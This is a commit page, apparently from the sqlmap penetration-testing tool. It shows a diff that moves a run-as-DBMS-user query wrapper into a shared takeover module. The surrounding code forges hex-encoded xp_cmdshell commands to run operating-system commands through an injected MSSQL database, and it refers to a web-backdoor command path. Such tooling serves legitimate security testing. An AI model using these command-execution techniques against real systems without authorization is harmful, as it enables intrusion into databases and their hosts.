Thanks to visit codestin.com
Credit goes to github.com

Skip to content

Commit add8352

Browse files
bdamelebdamele
committed
make the runAsDBMSUser() generic and ported to abstraction.py so the same function will be used for PostgreSQL dblink() too
1 parent 6697927 commit add8352

2 files changed

Lines changed: 17 additions & 17 deletions

File tree

lib/takeover/abstraction.py

Lines changed: 16 additions & 0 deletions
Original file line numberDiff line numberDiff line change
@@ -16,6 +16,7 @@
1616
from lib.core.enums import DBMS
1717
from lib.core.enums import PAYLOAD
1818
from lib.core.exception import sqlmapUnsupportedFeatureException
19+
from lib.core.settings import SQL_STATEMENTS
1920
from lib.core.shell import autoCompletion
2021
from lib.request import inject
2122
from lib.takeover.udf import UDF
@@ -37,6 +38,21 @@ def __init__(self):
3738
Web.__init__(self)
3839
xp_cmdshell.__init__(self)
3940

41+
def runAsDBMSUser(self, query):
42+
if conf.dCred:
43+
for sqlTitle, sqlStatements in SQL_STATEMENTS.items():
44+
for sqlStatement in sqlStatements:
45+
if query.lower().startswith(sqlStatement):
46+
sqlType = sqlTitle
47+
break
48+
49+
if sqlType and "SELECT" not in sqlType:
50+
query = "SELECT 1;%s" % query
51+
52+
query = getSPQLSnippet(DBMS.MSSQL, "run_statement_as_user", USER=conf.dbmsUsername, PASSWORD=conf.dbmsPassword, STATEMENT=query.replace("'", "''"))
53+
54+
return query
55+
4056
def execCmd(self, cmd, silent=False):
4157
if self.webBackdoorUrl and not isTechniqueAvailable(PAYLOAD.TECHNIQUE.STACKED):
4258
self.webBackdoorRunCmd(cmd)

lib/takeover/xp_cmdshell.py

Lines changed: 1 addition & 17 deletions
Original file line numberDiff line numberDiff line change
@@ -21,7 +21,6 @@
2121
from lib.core.enums import DBMS
2222
from lib.core.enums import HASHDB_KEYS
2323
from lib.core.exception import sqlmapUnsupportedFeatureException
24-
from lib.core.settings import SQL_STATEMENTS
2524
from lib.core.threads import getCurrentThreadData
2625
from lib.core.unescaper import unescaper
2726
from lib.request import inject
@@ -148,29 +147,14 @@ def xpCmdshellWriteFile(self, fileContent, tmpPath, randDestFile):
148147
if cmd:
149148
self.xpCmdshellExecCmd(cmd)
150149

151-
def xpCmdshellForgeRunAs(self, query):
152-
if conf.dCred:
153-
for sqlTitle, sqlStatements in SQL_STATEMENTS.items():
154-
for sqlStatement in sqlStatements:
155-
if query.lower().startswith(sqlStatement):
156-
sqlType = sqlTitle
157-
break
158-
159-
if sqlType and "SELECT" not in sqlType:
160-
query = "SELECT 1;%s" % query
161-
162-
query = getSPQLSnippet(DBMS.MSSQL, "run_statement_as_user", USER=conf.dbmsUsername, PASSWORD=conf.dbmsPassword, STATEMENT=query.replace("'", "''"))
163-
164-
return query
165-
166150
def xpCmdshellForgeCmd(self, cmd):
167151
self.__randStr = randomStr(lowercase=True)
168152
self.__cmd = "0x%s" % hexencode(cmd)
169153
self.__forgedCmd = "DECLARE @%s VARCHAR(8000);" % self.__randStr
170154
self.__forgedCmd += "SET @%s=%s;" % (self.__randStr, self.__cmd)
171155
self.__forgedCmd += "EXEC %s @%s" % (self.xpCmdshellStr, self.__randStr)
172156

173-
return self.xpCmdshellForgeRunAs(self.__forgedCmd)
157+
return self.runAsDBMSUser(self.__forgedCmd)
174158

175159
def xpCmdshellExecCmd(self, cmd, silent=False):
176160
cmd = self.xpCmdshellForgeCmd(cmd)

0 commit comments

Comments
 (0)